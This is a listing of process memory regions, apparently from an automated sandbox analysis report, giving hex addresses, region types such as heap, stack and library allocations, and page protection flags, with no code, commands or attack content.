7FFAAB3A0000
|
trusted library allocation
|
page read and write
|
||
|
1BBCAB2C000
|
trusted library allocation
|
page read and write
|
||
|
1F6FD8B0000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
1BBB8970000
|
heap
|
page read and write
|
||
|
202BE9C6000
|
trusted library allocation
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
7FFB167B5000
|
unkown
|
page readonly
|
||
|
202BA2DC000
|
heap
|
page read and write
|
||
|
25E56785000
|
heap
|
page read and write
|
||
|
1BBBC503000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAB0D4000
|
trusted library allocation
|
page read and write
|
||
|
202B96C0000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
1BBBA831000
|
trusted library allocation
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
1F6F84B2000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
29D2CDC3000
|
heap
|
page read and write
|
||
|
25E58A42000
|
trusted library allocation
|
page read and write
|
||
|
202BE9D3000
|
trusted library allocation
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
29D2CDCB000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BE9D3000
|
trusted library allocation
|
page read and write
|
||
|
202BA289000
|
heap
|
page read and write
|
||
|
202BEA65000
|
trusted library allocation
|
page read and write
|
||
|
202B96C0000
|
trusted library allocation
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BE775000
|
trusted library allocation
|
page read and write
|
||
|
29D2C8AF000
|
heap
|
page read and write
|
||
|
202BE9C8000
|
trusted library allocation
|
page read and write
|
||
|
202BA29D000
|
heap
|
page read and write
|
||
|
1BBBA820000
|
heap
|
page read and write
|
||
|
202BA440000
|
heap
|
page read and write
|
||
|
202BE2F1000
|
heap
|
page read and write
|
||
|
202BE341000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202BEA60000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAB0F0000
|
trusted library allocation
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA2DF000
|
heap
|
page read and write
|
||
|
1BBCA851000
|
trusted library allocation
|
page read and write
|
||
|
29D2C8BB000
|
heap
|
page read and write
|
||
|
1BBB897A000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
7FFAAB440000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAB0E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAB410000
|
trusted library allocation
|
page read and write
|
||
|
202BA43E000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
29D2C899000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA3DF000
|
heap
|
page read and write
|
||
|
202BE775000
|
trusted library allocation
|
page read and write
|
||
|
202B965C000
|
trusted library allocation
|
page read and write
|
||
|
29D2C850000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
29D2C8E6000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202BE6F4000
|
trusted library allocation
|
page read and write
|
||
|
202BA444000
|
heap
|
page read and write
|
||
|
D78D779000
|
stack
|
page read and write
|
||
|
29D2C86E000
|
heap
|
page read and write
|
||
|
214887E000
|
stack
|
page read and write
|
||
|
29D2CDC0000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
1F6FDA1E000
|
heap
|
page read and write
|
||
|
55C8B4E000
|
stack
|
page read and write
|
||
|
1F6F8400000
|
heap
|
page read and write
|
||
|
25E58908000
|
trusted library allocation
|
page read and write
|
||
|
1F6FDA2B000
|
heap
|
page read and write
|
||
|
202BA44A000
|
heap
|
page read and write
|
||
|
1FAB79C4000
|
heap
|
page read and write
|
||
|
202BE74F000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
1BBD2DA0000
|
heap
|
page read and write
|
||
|
1F6FDA84000
|
heap
|
page read and write
|
||
|
202BE820000
|
trusted library allocation
|
page read and write
|
||
|
1BBD2835000
|
heap
|
page read and write
|
||
|
1BBD2BD2000
|
heap
|
page read and write
|
||
|
1FAB7942000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1D8C2000
|
unkown
|
page readonly
|
||
|
202BA432000
|
heap
|
page read and write
|
||
|
1BBD2940000
|
heap
|
page read and write
|
||
|
25E56567000
|
heap
|
page read and write
|
||
|
202BE775000
|
trusted library allocation
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
1BBBB062000
|
trusted library allocation
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
29D2C8B1000
|
heap
|
page read and write
|
||
|
7FFAACC30000
|
trusted library allocation
|
page read and write
|
||
|
55C8AC3000
|
stack
|
page read and write
|
||
|
202BA442000
|
heap
|
page read and write
|
||
|
1F6FDC20000
|
remote allocation
|
page read and write
|
||
|
1FAB7895000
|
heap
|
page read and write
|
||
|
202BE775000
|
trusted library allocation
|
page read and write
|
||
|
1BBBACE3000
|
trusted library allocation
|
page read and write
|
||
|
A17584E000
|
stack
|
page read and write
|
||
|
29D2E7B0000
|
heap
|
page read and write
|
||
|
202BE9DA000
|
trusted library allocation
|
page read and write
|
||
|
1BBD2C42000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202BE75D000
|
trusted library allocation
|
page read and write
|
||
|
2147CFE000
|
unkown
|
page readonly
|
||
|
7FFAACA00000
|
trusted library allocation
|
page read and write
|
||
|
1FAB79C0000
|
heap
|
page read and write
|
||
|
D78D5FF000
|
stack
|
page read and write
|
||
|
202BE9C8000
|
trusted library allocation
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BE741000
|
trusted library allocation
|
page read and write
|
||
|
202BA429000
|
heap
|
page read and write
|
||
|
7FFAAB3C0000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A9000
|
heap
|
page read and write
|
||
|
7FFAACBB0000
|
trusted library allocation
|
page read and write
|
||
|
202BA2BB000
|
heap
|
page read and write
|
||
|
1F6F92E0000
|
trusted library section
|
page readonly
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA480000
|
heap
|
page read and write
|
||
|
7FFB16791000
|
unkown
|
page execute read
|
||
|
7FFAAB18C000
|
trusted library allocation
|
page execute and read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA299000
|
heap
|
page read and write
|
||
|
202BE74B000
|
trusted library allocation
|
page read and write
|
||
|
1F6FDAEE000
|
heap
|
page read and write
|
||
|
202BA442000
|
heap
|
page read and write
|
||
|
1F6FD960000
|
trusted library allocation
|
page read and write
|
||
|
202BA43E000
|
heap
|
page read and write
|
||
|
1F6FDA52000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
29D2CDB0000
|
heap
|
page read and write
|
||
|
202BA298000
|
heap
|
page read and write
|
||
|
7FFAAB340000
|
trusted library allocation
|
page read and write
|
||
|
202BE3C8000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
21482FE000
|
unkown
|
page readonly
|
||
|
1F6FDAF9000
|
heap
|
page read and write
|
||
|
A1754FE000
|
stack
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BE75F000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACB50000
|
trusted library allocation
|
page read and write
|
||
|
202BA2BB000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
1BBBC61F000
|
trusted library allocation
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA289000
|
heap
|
page read and write
|
||
|
1FAB78DC000
|
heap
|
page read and write
|
||
|
202BA29C000
|
heap
|
page read and write
|
||
|
7FFAAB320000
|
trusted library allocation
|
page read and write
|
||
|
202BE940000
|
trusted library allocation
|
page read and write
|
||
|
202BE38A000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA29F000
|
heap
|
page read and write
|
||
|
1F6F92C0000
|
trusted library section
|
page readonly
|
||
|
1F6FDA5F000
|
heap
|
page read and write
|
||
|
202BFE88000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC40000
|
trusted library allocation
|
page read and write
|
||
|
1F6F848B000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA2BB000
|
heap
|
page read and write
|
||
|
1FAB785D000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
1F6F82C0000
|
heap
|
page read and write
|
||
|
29D2C8E5000
|
heap
|
page read and write
|
||
|
7FFAACB10000
|
trusted library allocation
|
page execute and read and write
|
||
|
29D2C8D2000
|
heap
|
page read and write
|
||
|
1BBD29EE000
|
heap
|
page read and write
|
||
|
1F6F84A3000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
2147DFE000
|
stack
|
page read and write
|
||
|
202BE9C6000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202B94D4000
|
heap
|
page read and write
|
||
|
1F6F92B0000
|
trusted library section
|
page readonly
|
||
|
D78DAFE000
|
stack
|
page read and write
|
||
|
1F6FDA00000
|
heap
|
page read and write
|
||
|
1F6FD950000
|
trusted library allocation
|
page read and write
|
There are 1360 hidden memdumps, click here to show them.